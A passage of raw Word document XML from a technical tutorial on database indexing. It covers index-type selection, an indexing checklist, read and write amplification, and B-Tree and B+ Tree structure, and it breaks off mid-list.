              <w:t>Full-text search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D8038A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>GIN (tsvector) or Elasticsearch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="359FE77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6FC854" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Array/JSONB containment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65349B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>GIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="4C02E72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7E9851" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Spatial/geographic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A63317" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>GiST (PostGIS) or R-Tree</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="5EBBC18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699470" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Large sequential table (time-series)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70500C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>BRIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="583BF13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FBA0AB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Rare condition (5% of rows)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4FB768" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Partial index (WHERE condition)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="55ED9A8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A19C0E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Function on column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EC8D17" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Expression index</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="600B2F5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4EDBFB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>All-columns-needed query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59EDF8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Covering index (INCLUDE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2824EEAF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="1CE3D08D">
          <v:rect id="_x0000_i5337" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE578A1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18. Summary — The Complete Mental Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D519627" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental indexing principle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFA0B97" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>An index trades write performance and storage for read performance. It's a pre-computed answer to "where is the data that matches this condition?" — stored as a sorted, searchable structure that avoids scanning the entire dataset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9B8D40" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The system designer's indexing checklist:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5686B195" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1484"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Identify the critical queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> (by frequency, latency, business impact).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08577919" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1484"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Design indexes for those queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> (three-star system: filter → sort → cover).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECD7100" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1484"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Measure the improvement</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> (EXPLAIN ANALYZE before and after).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A74DA53" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1484"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Monitor write impact</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> (did inserts/updates get noticeably slower?).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE88D5F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1484"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Audit periodically</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> (drop unused indexes, add missing ones as queries evolve).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178472F2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1484"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Size appropriately</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> (indexes should fit in RAM for optimal performance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3A6416" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1484"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Choose the right structure</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> (B-Tree for general, GIN for search, BRIN for sequential, Hash for exact-match-only).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1E8659" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The key numbers to remember:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4414BC74" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8E89DA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>B-Tree lookup: O(log n) = 3–5 page reads for billions of rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794B569E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Full scan: O(n) = reading EVERY page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A46F737" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Index makes a 10M-row lookup: 0.1ms instead of 5000ms (50,000x improvement)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F86D0B8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Each additional index: ~1 extra write I/O per insert/update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22021796" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Index size: typically 10–30% of table size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454F88F8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Target buffer hit ratio: &gt; 99% (indexes should live in RAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E78374" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Indexing — Deep Technical Breakdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AAC8F0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="54F775AA">
          <v:rect id="_x0000_i5421" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EB8A30" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What Indexing Actually Is (The Real Engineering Problem)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0521159A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Indexing is not simply "making queries faster." That describes the outcome but completely misses the engineering depth. Indexing is the discipline of </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>maintaining auxiliary data structures that trade write amplification, storage overhead, and consistency complexity for dramatic reductions in read amplification</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> — the number of storage units that must be examined to satisfy a query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61467754" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>The engineering problem indexing solves is fundamental to how data is physically stored. Data on disk is organized in </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pages</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> (typically 8KB–16KB blocks). A table with 100 million rows storing 1KB each occupies approximately 100GB across ~12.5 million pages. A query for a single row by a non-indexed column must examine every page — 12.5 million disk reads. At 100µs per NVMe SSD read, that is 1,250 seconds. With an index on that column, the same query examines O(log N) pages — perhaps 4–5 pages — completing in under 1ms. The index converts O(N) reads into O(log N) reads by maintaining a separate, sorted, or otherwise organized structure that maps column values to their row locations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675CCF2B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>But indexes are not free. Every index is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>separate data structure that must be maintained on every write</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> — insert, update, delete. A table with 5 indexes requires 6 write operations per row insertion (1 for the heap, 5 for the indexes). This is </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>write amplification</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> — each logical write becomes multiple physical writes. Furthermore, indexes consume storage (often 10–30% of table size each), consume memory (indexes are cached in the buffer pool), and complicate query planning (the optimizer must choose among many possible index access paths). The art of indexing is finding the optimal set of indexes that minimizes read amplification for the actual query workload while keeping write amplification, storage overhead, and planning complexity at acceptable levels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8495E9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="3469DB57">
          <v:rect id="_x0000_i5422" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F77FE0F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. B-Tree Indexes — The Universal Standard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695A6D5F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why B-Trees, Not Binary Search Trees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D22D351" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>A binary search tree with N nodes has height O(log₂ N). For 1 billion rows, height ≈ 30. Each node traversal is a page read. But binary search tree nodes contain one key each — a single 8-byte integer occupies one 8KB page, using 0.01% of the page's capacity. This wastes 99.99% of each page read.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C11A34A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The B-Tree solution:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Each node contains </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>many keys</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t>, filling the page as fully as possible. A B-Tree node with 8KB pages and 8-byte keys + 8-byte pointers holds approximately 500 key-pointer pairs. The branching factor is ~500 rather than 2. Height = log₅₀₀(N). For 1 billion rows: height = log₅₀₀(10⁹) ≈ 3.7 → </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4 page reads</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> instead of 30.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB2380E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1D59AF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>B-Tree properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04067E4C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Every node contains between </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>⌈</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t>m/2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>⌉</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve"> and m keys (m = order of tree)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0827D66C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  All leaf nodes are at the same depth (perfectly balanced)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B59922C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Internal nodes contain keys + pointers to child nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364990E1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Leaf nodes contain keys + pointers to actual data (or data itself)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F47DAFC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A8C7D1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>For m=500 (typical for 8KB pages, 8-byte keys):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600687B2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Height 1: 500 keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7590B1A5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Height 2: 500² = 250,000 keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFBFC0E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Height 3: 500³ = 125,000,000 keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40017B54" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Height 4: 500⁴ = 62,500,000,000 keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E521FB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58555334" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Most production indexes: 3-4 levels deep, regardless of table size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C65D47F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>B+ Tree — The Actual Implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4995E779" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Most databases (PostgreSQL, MySQL InnoDB, Oracle, SQL Server) implement </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>B+ Trees</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t>, not plain B-Trees:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DDF6E9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>B+ Tree distinguishing properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C55F5FA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1485"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>All data in leaf nodes:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Internal nodes contain only keys for routing — no data pointers. All actual row pointers (or data) are in leaf nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CA4D89" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1485"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Leaf nodes form a doubly-linked list:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Adjacent leaf nodes are connected with forward and backward pointers. This enables </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>range scans</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> — after finding the first key in a range via tree traversal, subsequent keys are accessed by following leaf node links without re-traversing the tree.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340D792E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1485"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Higher branching factor:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Internal nodes contain only keys (no data), so more keys fit per page → higher branching factor → lower tree height.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EEAF95" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D2A0BF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>B+ Tree structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096DB361" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="50874A9B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Internal nodes: [key1 | ptr1 | key2 | ptr2 | key3 | ptr3 ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71460940" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  ptr1 → subtree with keys &lt; key1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DDE080" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  ptr2 → subtree with key1 ≤ keys &lt; key2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FA58E8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  ...</w:t>
      </w:r>
